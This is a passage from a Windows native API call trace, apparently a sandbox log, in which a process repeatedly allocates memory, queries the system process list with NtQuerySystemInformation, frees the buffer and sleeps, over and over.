SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.568] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 